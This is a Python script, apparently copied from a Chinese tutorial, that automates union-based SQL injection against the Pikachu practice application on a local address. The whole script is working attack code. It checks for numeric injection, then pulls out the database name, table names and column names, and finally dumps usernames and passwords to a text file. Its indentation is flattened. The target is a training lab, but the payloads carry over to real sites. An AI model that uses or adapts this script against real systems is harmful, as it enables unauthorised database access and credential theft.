复制代码
#target_table = int(input("请输入你要爆破的表名位置:table_list[x]:"))#注意类型
#注意页面回显,看两段,以及返回几个内容
#r'your email is:(.*?)</p>', col_resp.text, re.S)注意正则匹配不要多加空格
#from {table_list[target_table]} 和where table_name = '{table_list[target_table]}'
import requests
import re
target_url = "http://192.168.8.1/pikachu-master/vul/sqli/sqli_id.php"
if __name__ == "__main__":
with open("post_sql.txt", "w", encoding="utf-8") as f:
true_payload = {"id": "1 or 1=1 #", "submit": "查询"}
false_payload = {"id": "1 or 1=2 #", "submit": "查询"}
resp_true = requests.post(url=target_url, data=true_payload)
resp_false = requests.post(url=target_url, data=false_payload)
if len(resp_true.text) != len(resp_false.text):
print("[+] 注入成功,存在数字型注入!")
print("[+] 接下来开始爆库,爆表,爆字段")
else:
print("[-] 注入失败开始重新构造Payload")
print(resp_false.text[:500])
exit()
print("=" * 50)
print("[+] 开始爆库")
db_payload = {"id": "1 union select 1,database() #", "submit": "查询"}
db_resp = requests.post(url=target_url, data=db_payload)
db_match = re.findall(r"your email is: (.*?)</p>", db_resp.text, re.S)
if db_match:
db_name = db_match[-1].strip()
print(f"[+] 成功获取到库名:{db_name}")
f.write(f"[+] 库名{db_name}\n")
else:
print("[-] 爆库失败,请重新构造payload!")
print(db_resp.text[:500])
exit()
print("="*50)
print("[+] 开始爆表 ")
table_payload = {"id":"1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #","submit":"查询"}
table_resp = requests.post(url=target_url, data=table_payload)
table_match = re.findall(r"your email is:(.*?)</p>",table_resp.text, re.S)
if table_match:
print("[+] 成功爆破 ")
table_name = table_match[-1].strip() #生成的是""字符串
table_list = table_name.split(",")
f.write(f"[+] 表名{table_list}\n")
print(f"[+] table_list = {table_list}")
else:
print("[-] 爆表失败,重新构造payload!")
print(table_resp.text[:500])
print("="*50)
print("[+] 爆破字段")
target_table = int(input("请输入你要爆破的表名位置:table_list[x]:"))#注意类型
col_payload = {"id":f"1 union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = '{table_list[target_table]}' #","submit":"查询"}
col_resp = requests.post(url=target_url, data=col_payload)
col_match = re.findall(r'your email is:(.*?)</p>', col_resp.text, re.S)
if col_match:
col_name = col_match[-1].strip()
print("[+] 注入成功 ")
col_list = col_name.split(",")
print(f"[+] 段名为{col_list}")
f.write(f"[+] 保存{col_list}\n")
else:
print("[-] 注入失败 ")
print(col_resp.text[:500])
print("="*50)
num1,num2 = map(int,input("请输入你要查询的两个字段内容col_list[num]用逗号隔开:").split(","))
pwd_payload = {"id":f"1 union select 1,group_concat({col_list[num1]},'|',{col_list[num2]}) from {table_list[target_table]} #","submit":"查询"}
pwd_resp = requests.post(url=target_url, data=pwd_payload)
user_matchs = re.findall(r'hello,(.*?)</p>', pwd_resp.text, re.S)
pwd_matchs = re.findall(r'your email is:(.*?)</p>', pwd_resp.text, re.S)
if pwd_matchs:
print("[+] 注入成功 ")
print(f"[+] 账号和密码为:\n")
result = pwd_matchs[-1].strip()
user_pwd_list = result.split(",")
for up in user_pwd_list:
if '|' in up:
user,pwd = up.split('|',1)
print(f"[+] 用户名:{user} 密码:{pwd}")
f.write(f"用户名:{user} | 密码:{pwd}\n")
else:
print("[-] 注入失败,请重新构造payload")
for line in pwd_resp.text.splitlines():
if "hello" in line or "your email" in line:
print(line.strip())
f.write(line.strip() + "\n")
print("[+] 结果已保存在 post_sql.txt")